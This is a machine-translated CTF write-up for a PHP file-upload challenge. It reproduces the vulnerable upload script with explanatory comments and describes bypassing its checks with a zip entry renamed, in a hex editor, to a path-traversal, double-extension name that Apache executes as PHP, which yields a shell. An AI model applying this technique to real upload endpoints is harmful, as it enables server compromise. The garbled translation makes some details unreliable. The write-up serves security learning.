It took more than a day to build it docker Environment , Then write this again. I can only say that my environment is too sweet But this problem also took a little time to ponder

Topic analysis

Open questions , Discovery is the same file upload interface as before

Habitually grab a bag , The source code of the interface has been completely exposed , It's too long to put here ( Based on previous experience and reference to other Masters wp A little analysis ）

  <?php
header("Content-Type:text/html; charset=utf-8");
//  Every time 5 The uploaded files in the directory will be cleared every minute 

// Will include files pclzip.lib.php, Feel this php There are some for zip Package decompression and other operations 
require_once('pclzip.lib.php');

// If you don't upload the file , Just output the upload page 
if(!$_FILES){
echo ' Omitted HTML'
    show_source(__FILE__);
}else{
    $file = $_FILES['file'];

// Limit the uploaded file name to not be empty 
    if(!$file){
        exit(" Do not upload empty files ");
    }
    $name = $file['name'];

    $dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
     $path = $dir.$name;
//strrchr($name, '.') 
//strrchr()  Function to find the last occurrence of a string in another string , And returns all the characters from that position to the end of the string .
// For example, the uploaded file name is $name=1.php.txt, here strrchr($name, '.')  The execution result is .txt
//substr(strrchr($name, '.'), 1)
//substr String interception , From the subscript for 1 Began to intercept , That is to skip the point , After interception, it is txt
// adopt strtolower The function converts all characters to lowercase , Assign a value to ext Variable 
// If we upload a file named 1.txt, that path The variable is upload/1.txt


// Check if it is a directory 
    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                 }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            
            }
        }
    }
    
// Create directory     
    if(!is_dir($dir)){
        mkdir($dir);
    }


    $temp_dir = $dir.md5(time(). rand(1000,9999));
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }
// This should be the most difficult , It's probably just splicing the directory name into a random number , Read here , Basically, I know that the path needs to be crossed 
 Because we don't know random numbers , So even if you bypass the upload , Parsing is also a big hurdle （ The path is not hard to find , It is difficult to parse ）


// First, check the suffix , Take what you just got , the last one . The following string is the same as zip、jpg、gif、png Compare and verify 
    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
        if($ext == 'zip'){
// Use PclZip Decompress         
            $archive = new PclZip($file['tmp_name']);
// Traverse each directory after decompression             
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
// A relatively simple regular , The position at the end of each file is the match , Whether it is .php                
                if(preg_match('/\.php$/', $filename)){
                     exit(" Compressed packages are not allowed to contain php file !");
                 }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit(" Decompression failed ");
            }

            check_dir($dir);
            exit(' Upload successful !');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit(' Upload successful !');
        }
    }else{
        exit(' Only upload is allowed zip、jpg、gif、png file !');
    }
}

So the path of the uploaded file is upload/ Random value / Uploaded file name

The problem solving process

We construct the final file named /…/…/hhh.php.xxx Why set the file name like this ？
1）/…/…/
Because we have to go around the road to be tested , Put the file into the specified directory through path traversal ( Upload the file to web The root directory ） So the first floor is upload, The first layer is random value , So we have to cross two floors , Up to the root So that we can access
2）hhh.php.xxx

apache Version is 2.4.7, When we upload a hhh.php Uploading is not allowed , But we upload hhh.php.xxx The suffix check is bypassed , Uploaded to the root directory , utilize apache Parsing vulnerabilities , Let's access this file again , At this time apache Start parsing later , encounter xxx, incognizance , Further analysis ,php, know , This is the time apache Will be hhh.php.xxx File resolved to hhh.php Script files , You can get shell 了

First, we create a file （ It's not a folder ！！）, The file suffix is arbitrary , As long as the file name length meets 18 that will do , This successfully covers the suffix completely

Compress the file into zip

stay 010Edtior Open the compressed package

Change the file name to ：/…/…/hhh.php.xxx ( Practice /…/…/1.php.xxx When it doesn't work , I think it's a length problem , But look at some Masters wp Again ？？ It's a little strange. ）

Upload the compressed package to bypass the suffix check , And then we were in kail You can see that the file has been uploaded successfully , So let's visit this file

obtain flag

Add ： Verify the path of the uploaded file hahaha
Casually upload a file that matches the post whitelist （ picture ）, stay kail It can be seen that this is indeed the case

Article reference ：
https://blog.csdn.net/zy15667076526/article/details/114139749
https://www.cnblogs.com/murkuo/p/14915458.html